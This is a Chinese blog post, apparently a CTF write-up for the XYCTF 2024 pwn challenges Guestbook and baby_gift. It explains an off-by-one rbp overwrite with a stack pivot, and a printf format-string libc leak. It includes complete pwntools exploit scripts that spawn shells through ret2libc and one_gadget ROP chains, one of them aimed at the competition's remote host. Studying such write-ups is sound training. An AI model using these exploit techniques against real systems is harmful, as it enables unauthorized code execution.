<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="xyctf2024       这是新生赛？不得不说出题人真的强">
<meta property="og:type" content="article">
<meta property="og:title" content="xyctf2024 pwn部分wp">
<meta property="og:url" content="http://example.com/2024/05/07/xyctf/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="xyctf2024       这是新生赛？不得不说出题人真的强">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507225258841.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507225358022.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507225453122.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507225412803.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507230453297.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507231203026.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507231730453.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240507231746437.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510150118780.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510150157683.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510150257925.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510150608945.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510150437273.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510150739225.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510151030248.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510152820144.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510153839813.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510154311432.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510160546700.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510161209754.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/image-20240510162658292.png">
<meta property="og:image" content="http://example.com/public/images/mdpicture/af9226cb465e6b3d60d8c20c8c191c1.png">
<meta property="article:published_time" content="2024-05-07T14:50:51.948Z">
<meta property="article:modified_time" content="2024-05-10T08:36:19.481Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/public/images/mdpicture/image-20240507225258841.png"><title>xyctf2024 pwn部分wp | Hexo</title><link ref="canonical" href="http://example.com/2024/05/07/xyctf/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":false,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 7.2.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner header-inner--height header-inner--bgcolor"><nav class="header-nav header-nav--sticky"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">xyctf2024 pwn部分wp</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2024-05-07</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2024-05-10</span></span></div></header><div class="post-body">
        <h1 id="xyctf2024"   >
          <a href="#xyctf2024" class="heading-link"><i class="fas fa-link"></i></a><a href="#xyctf2024" class="headerlink" title="xyctf2024"></a>xyctf2024</h1>
      <p>这是新生赛？不得不说出题人真的强</p>
<p><em><span id="more"></span></em></p>

        <h2 id="Guestbook"   >
          <a href="#Guestbook" class="heading-link"><i class="fas fa-link"></i></a><a href="#Guestbook" class="headerlink" title="Guestbook"></a>Guestbook</h2>
      <p>来看一道比较有意思的pwn题，先来看下保护措施</p>
<p><img src="/../public/images/mdpicture/image-20240507225258841.png" alt="image-20240507225258841"></p>
<p>拖进ida看一下</p>
<p><img src="/../public/images/mdpicture/image-20240507225358022.png" alt="image-20240507225358022"></p>
<p>题目中还存在着一个后门函数，进去看一下</p>
<p><img src="/../public/images/mdpicture/image-20240507225453122.png" alt="image-20240507225453122"></p>
<p>猜测这道题应该是想让我们把返回地址设置在这个地方，这个题没有开启PIE和canary，所以不用去考虑泄露main的基址和canary，再来看一下guestbook函数</p>
<p><img src="/../public/images/mdpicture/image-20240507225412803.png" alt="image-20240507225412803"></p>
<p>hhu表示每次读入一个字节的内容，初看觉得无法溢出，但是仔细想一下name数组的大小为32，数组下标应该是0-31，但是这个题没有对32进行检查，那么会出现一个什么后果呢，看下图</p>
<p><img src="/../public/images/mdpicture/image-20240507230453297.png" alt="image-20240507230453297"></p>
<p>由于rbp处存放prev_rbp,所以id+32其实是指向prev_rbp的最后一个字节，所以当我们使用32下标的时候，就会修改prev_rbp的最后一个字节，rbp被修改了，想到了什么？是的，栈迁移，当函数从guest返回至main的时候执行一次leave ret，从main函数返回的时候又会执行一次，所以两次leave ret的条件有了，程序最后会将rsp指向被修改的prev_ebp指向的位置（有点绕），看图</p>
<p><img src="/../public/images/mdpicture/image-20240507231203026.png" alt="image-20240507231203026"></p>
<p>那么被修改后的prev_rbp会指向哪呢，rbp只是被修改了最后一个字节，所以指向的位置还是栈上的某个位置，因为地址随机化，我们不知道具体的位置，调试看一下是不是我们想的这样</p>
<p><img src="/../public/images/mdpicture/image-20240507231730453.png" alt="image-20240507231730453"></p>
<p>index 输入32，id输入0，我们可以看到rbp确实被改变了</p>
<p><img src="/../public/images/mdpicture/image-20240507231746437.png" alt="image-20240507231746437"></p>
<p>既然我们能控制返回地址位于栈上的某个随机的位置，那接下来该怎么办？</p>
<p>我们可以在站上部署一系列的ret指令的地址，既然最后的返回地址随机，那我们干脆把栈填满ret最后再补上一个backdoor的地址不就可以了，我们尽量让地址小一些，目的是使prev_rbp能指向Guestbook函数的栈空间，所以我们把最后一个字节填为0，上图这种情况可以改变rbp但是不能使rbp指向我们构造的一系列ret和backdoor，所以运行的时候有几率会失败，多试几次就好了</p>

        <h3 id="思路"   >
          <a href="#思路" class="heading-link"><i class="fas fa-link"></i></a><a href="#思路" class="headerlink" title="思路"></a>思路</h3>
      <p>在栈上部署一系列ret最后补上backdoor地址，然后溢出一个字节使栈迁移到栈上payload区域</p>

        <h3 id="exp"   >
          <a href="#exp" class="heading-link"><i class="fas fa-link"></i></a><a href="#exp" class="headerlink" title="exp"></a>exp</h3>
      <figure class="highlight py"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">io=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line">ret=<span class="number">0x40101a</span></span><br><span class="line">backdoor=<span class="number">0x40133A</span></span><br><span class="line">payload=p64(ret)*<span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;index\n&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(i).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27;name:\n&#x27;</span>)</span><br><span class="line">    io.sendline(payload)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;id:\n&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&quot;index\n&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">b&#x27;32&#x27;</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;name:\n&quot;</span>)</span><br><span class="line">payload=p64(ret)+p64(backdoor)</span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">&quot;id:\n&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;index\n&#x27;</span>)</span><br><span class="line">io.sendline(<span class="string">b&#x27;-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></div></figure>


        <h2 id="baby-gift"   >
          <a href="#baby-gift" class="heading-link"><i class="fas fa-link"></i></a><a href="#baby-gift" class="headerlink" title="baby_gift"></a>baby_gift</h2>
      <p>想了挺久的题目，结合了几个佬的wp终于是想明白了，先来看下保护措施</p>
<p><img src="/../public/images/mdpicture/image-20240510150118780.png" alt="image-20240510150118780"></p>
<p>再拖进ida看一下</p>
<p><img src="/../public/images/mdpicture/image-20240510150157683.png" alt="image-20240510150157683"></p>
<p>main函数平平无奇，进入Getinfo看一下</p>
<p><img src="/../public/images/mdpicture/image-20240510150257925.png" alt="image-20240510150257925"></p>
<p>查看反汇编代码，发现可以溢出0x20字节，但实际只能使用0x18字节，我们再来看下程序可以利用的gadget</p>
<p><img src="/../public/images/mdpicture/image-20240510150608945.png" alt="image-20240510150608945"></p>
<p>除了ret可以平衡堆栈外，其他没有有用的gadget，再来看一下Gift的内容</p>
<p><img src="/../public/images/mdpicture/image-20240510150437273.png" alt="image-20240510150437273"></p>
<p>没有东西，查看一下反汇编代码</p>
<p><img src="/../public/images/mdpicture/image-20240510150739225.png" alt="image-20240510150739225"></p>
<p>反汇编代码中，将rdi的值保存在rbp-8的位置，还是没有思路，阅读整个汇编代码，找找线索</p>
<p><img src="/../public/images/mdpicture/image-20240510151030248.png" alt="image-20240510151030248"></p>

        <h3 id="思路-1"   >
          <a href="#思路-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#思路-1" class="headerlink" title="思路"></a>思路</h3>
      <p>在getinfo函数中，当我们call gift的时候，改变了rdi的值，将rdi的值改为了rbp-0x20(v2的地址)，那也就意味着，我们可以控制rdi的内容，从而控制函数的第一个参数，题目中没有puts函数，但是存在printf参数，所以就想到了格式化字符串漏洞，在v2中输入格式化字符串然后返回到call printf（0x401279）执行，试验一下</p>
<p><img src="/../public/images/mdpicture/image-20240510152820144.png" alt="image-20240510152820144"></p>
<p>打印失败，我们注意到printf每次call之前都会有一个mov  eax，0的操作，所以使用前要先将eax置零，这里找了好几篇wp看，原因如下</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">  0x7f838103e703 &lt;printf+19&gt;    mov    qword ptr [rsp + 0x30], rdx</span><br><span class="line">  0x7f838103e708 &lt;printf+24&gt;    mov    qword ptr [rsp + 0x38], rcx</span><br><span class="line">  0x7f838103e70d &lt;printf+29&gt;    mov    qword ptr [rsp + 0x40], r8</span><br><span class="line">  0x7f838103e712 &lt;printf+34&gt;    mov    qword ptr [rsp + 0x48], r9</span><br><span class="line">  0x7f838103e717 &lt;printf+39&gt;    test   al, al</span><br><span class="line">► 0x7f838103e719 &lt;printf+41&gt;    je     printf+98                &lt;printf+98&gt;</span><br></pre></td></tr></table></div></figure>

<p>这是printf的源码，发现有一个test指令，当al为0的时候才会进入到printf，所以我们将返回值修改为call printf前的mov指令</p>
<p>还有个问题，我们改为哪一个printf，有两处可以利用，一处为menu函数内的，另一处为getinfo函数中的，我们来分析一下</p>

        <h3 id="返回地址确定"   >
          <a href="#返回地址确定" class="heading-link"><i class="fas fa-link"></i></a><a href="#返回地址确定" class="headerlink" title="返回地址确定"></a>返回地址确定</h3>
      
        <h4 id="落到menu函数中的printf"   >
          <a href="#落到menu函数中的printf" class="heading-link"><i class="fas fa-link"></i></a><a href="#落到menu函数中的printf" class="headerlink" title="落到menu函数中的printf"></a><strong>落到menu函数中的printf</strong></h4>
      <p><img src="/../public/images/mdpicture/image-20240510153839813.png" alt="image-20240510153839813"></p>
<p>我们看到在call printf之后一直到pop rbp才出现对栈的操作，所以我们应该在返回地址后再添加一串垃圾数据，将其pop到rbp中，然后再填入返回地址</p>
<figure class="highlight py"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#构造的payload如下</span></span><br><span class="line">menu=<span class="number">0x401202</span> </span><br><span class="line">payload=<span class="string">b&#x27;%27$pa&#x27;</span>.ljust(<span class="number">0x28</span>,<span class="string">b&#x27;\x00&#x27;</span>)+p64(menu)+p64(<span class="number">0</span>)+p64(<span class="number">0x4012B7</span>)</span><br></pre></td></tr></table></div></figure>

<p><img src="/../public/images/mdpicture/image-20240510154311432.png" alt="image-20240510154311432"></p>
<p>上述的0x4012B7为main函数中的地址，这是我看到其中一个佬的wp学到的，若返回地址填入main，动态调试一下，发现程序卡在了menu中的printf里</p>
<p><img src="/../public/images/mdpicture/image-20240510160546700.png" alt="image-20240510160546700"></p>
<p>具体原因还没发现。。。。希望有人指点一下，但是改为4012B7可以正常返回运行。。。。</p>

        <h4 id="落到getinfo中的printf"   >
          <a href="#落到getinfo中的printf" class="heading-link"><i class="fas fa-link"></i></a><a href="#落到getinfo中的printf" class="headerlink" title="落到getinfo中的printf"></a><strong>落到getinfo中的printf</strong></h4>
      <p><img src="/../public/images/mdpicture/image-20240510161209754.png" alt="image-20240510161209754"></p>
<p>如果落到getinfo中，末尾有leave retn指令，加上正常执行时的getinfo中的leave retn，就等于执行了两次，那么就可以实现栈迁移</p>
<figure class="highlight py"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">b&#x27;%27$p&#x27;</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x20</span>,<span class="string">b&#x27;#&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 这里是用来进行栈溢出的指令，rbp被修改为bss_addr的值</span></span><br><span class="line"><span class="comment"># 0x401274是printf前面一行mov eax,0的地址</span></span><br><span class="line">payload2 = payload+p64(bss_addr)+p64(<span class="number">0x401274</span>)</span><br></pre></td></tr></table></div></figure>

<p>上面是其中一位佬的wp</p>

        <h3 id="格式化字符串偏移的确定"   >
          <a href="#格式化字符串偏移的确定" class="heading-link"><i class="fas fa-link"></i></a><a href="#格式化字符串偏移的确定" class="headerlink" title="格式化字符串偏移的确定"></a><strong>格式化字符串偏移的确定</strong></h3>
      <p>这里用到了动态调试的技巧，在py中添加gdb.attach(io)，然后gdb中使用以下命令</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">b *0x401202  #menu中的地址</span><br><span class="line">c</span><br></pre></td></tr></table></div></figure>

<p><img src="/../public/images/mdpicture/image-20240510162658292.png" alt="image-20240510162658292"></p>
<p>可以看到成功断在此处，然后停在printf处查看偏移</p>
<p><img src="/../public/images/mdpicture/af9226cb465e6b3d60d8c20c8c191c1.png" alt="af9226cb465e6b3d60d8c20c8c191c1"></p>
<p>我们要泄露的libc_start_main中的地址在这，偏移为27（记得这是64位，还有参数在reg中），到这为止，这个题基本上结束了，后面就是构造system的ROP了，和前面一样，第一次参数写入v2中。</p>

        <h3 id="exp-1"   >
          <a href="#exp-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3>
      <figure class="highlight py"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">io = process(<span class="string">&#x27;./vuln&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./vuln&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">getinfo = <span class="number">0x401228</span></span><br><span class="line"><span class="comment">#getinfo = elf.sym[&#x27;GetInfo&#x27;]</span></span><br><span class="line">ret = <span class="number">0x000000000040101a</span></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;Your name:\n&#x27;</span>)</span><br><span class="line">io.sendline(<span class="string">b&#x27;aaa&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;Your passwd:\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line">main = <span class="number">0x4012AF</span></span><br><span class="line"><span class="comment">#0x4012B7   right</span></span><br><span class="line">menu=<span class="number">0x401202</span> </span><br><span class="line">start=<span class="number">0x04010B0</span>  <span class="comment">#right</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;%27$pa&#x27;</span>.ljust(<span class="number">0x28</span>,<span class="string">b&#x27;\x00&#x27;</span>)+p64(menu)+p64(<span class="number">0</span>)+p64(<span class="number">0x4012B7</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#payload = b&#x27;%27$p&#x27;</span></span><br><span class="line"><span class="comment">#payload = payload.ljust(0x28,b&#x27;a&#x27;) + p64(0x401202) + p64(ret) + p64(start)</span></span><br><span class="line"></span><br><span class="line">gdb.attach(io)</span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line">libc_main_addr = <span class="built_in">int</span>(io.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">128</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_main_addr))</span><br><span class="line"></span><br><span class="line">libc_base = libc_main_addr - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(system_addr))</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;Your name:\n&#x27;</span>)</span><br><span class="line">io.sendline(<span class="string">b&#x27;aaa&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;Your passwd:\n&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x28</span>,<span class="string">b&#x27;\x00&#x27;</span>) + p64(ret) +p64(system_addr)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></div></figure>


        <h3 id="栈迁移exp"   >
          <a href="#栈迁移exp" class="heading-link"><i class="fas fa-link"></i></a><a href="#栈迁移exp" class="headerlink" title="栈迁移exp"></a>栈迁移exp</h3>
      <figure class="highlight py"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#搬运的一个佬的</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">context.log_level =<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">main_addr = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">gift_addr = elf.sym[<span class="string">&#x27;Gift&#x27;</span>]</span><br><span class="line">giftInfo_addr = elf.sym[<span class="string">&#x27;GetInfo&#x27;</span>]</span><br><span class="line">printf_plt = elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line"></span><br><span class="line">bss_addr = <span class="number">0x404908</span></span><br><span class="line">info(<span class="string">f&#x27;<span class="subst">&#123;main_addr = :x&#125;</span>&#x27;</span>)</span><br><span class="line">ret_addr = <span class="number">0x000000000040101a</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;%27$p&#x27;</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x20</span>,<span class="string">b&#x27;#&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 这里是用来进行栈溢出的指令，rbp被修改为bss_addr的值</span></span><br><span class="line"><span class="comment"># 0x401274是printf前面一行mov eax,0的地址</span></span><br><span class="line">payload2 = payload+p64(bss_addr)+p64(<span class="number">0x401274</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># io = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;xyctf.top&#x27;</span>,<span class="number">47701</span>)</span><br><span class="line"><span class="comment"># gdb.attach(io,&#x27;b *0x4012ac\nc\n&#x27;)</span></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;name:\n&#x27;</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x19</span>)   <span class="comment"># 注意fgets函数是要识别\n字符，不然会一直等待</span></span><br><span class="line">io.sendlineafter(<span class="string">b&#x27;passwd:\n&#x27;</span>,payload2)</span><br><span class="line"></span><br><span class="line">libc_main_addr = (io.recvuntil(<span class="string">b&#x27;#&#x27;</span>,drop=<span class="literal">True</span>)[-<span class="number">14</span>:])</span><br><span class="line">libc_main_addr = <span class="built_in">eval</span>(libc_main_addr)-<span class="number">128</span></span><br><span class="line">libc.address = libc_main_addr - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">system_addr = libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">ogg = libc.address +  <span class="number">0xebd3f</span></span><br><span class="line">pop_rdi = libc.address + <span class="number">0x000000000002a3e5</span></span><br><span class="line">pop_rsi = libc.address + <span class="number">0x000000000002be51</span></span><br><span class="line">pop_rdx_r12 =libc.address +  <span class="number">0x000000000011f2e7</span></span><br><span class="line">pop_rax = libc.address +  <span class="number">0x0000000000045eb0</span></span><br><span class="line"></span><br><span class="line">info(<span class="string">f&#x27;<span class="subst">&#123;libc_main_addr = :x&#125;</span>&#x27;</span>)</span><br><span class="line">info(<span class="string">f&#x27;<span class="subst">&#123;libc.address = :x&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># bss_addr - 0x20的地址，此时用了栈迁移，将栈放在bss中，rbp地址的值我直接写成rbp的地址了，这样后面还有leave指令也不会动寄存器</span></span><br><span class="line">payload3 = <span class="string">b&#x27;d&#x27;</span>*<span class="number">0x18</span> +p64(<span class="number">0</span>)+ p64(bss_addr) + p64(pop_rax) +p64(<span class="number">0</span>)+p64(ogg)</span><br><span class="line"></span><br><span class="line">io.sendline(payload3)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></div></figure>

</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><nav class="post-paginator paginator"><div class="paginator-next"><a class="paginator-next__link" href="/2024/04/30/hello-world/"><span class="paginator-prev__text">Hello World</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#xyctf2024"><span class="toc-number">1.</span> <span class="toc-text">
          xyctf2024</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Guestbook"><span class="toc-number">1.1.</span> <span class="toc-text">
          Guestbook</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">1.1.1.</span> <span class="toc-text">
          思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">1.1.2.</span> <span class="toc-text">
          exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-gift"><span class="toc-number">1.2.</span> <span class="toc-text">
          baby_gift</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%94%E5%9B%9E%E5%9C%B0%E5%9D%80%E7%A1%AE%E5%AE%9A"><span class="toc-number">1.2.2.</span> <span class="toc-text">
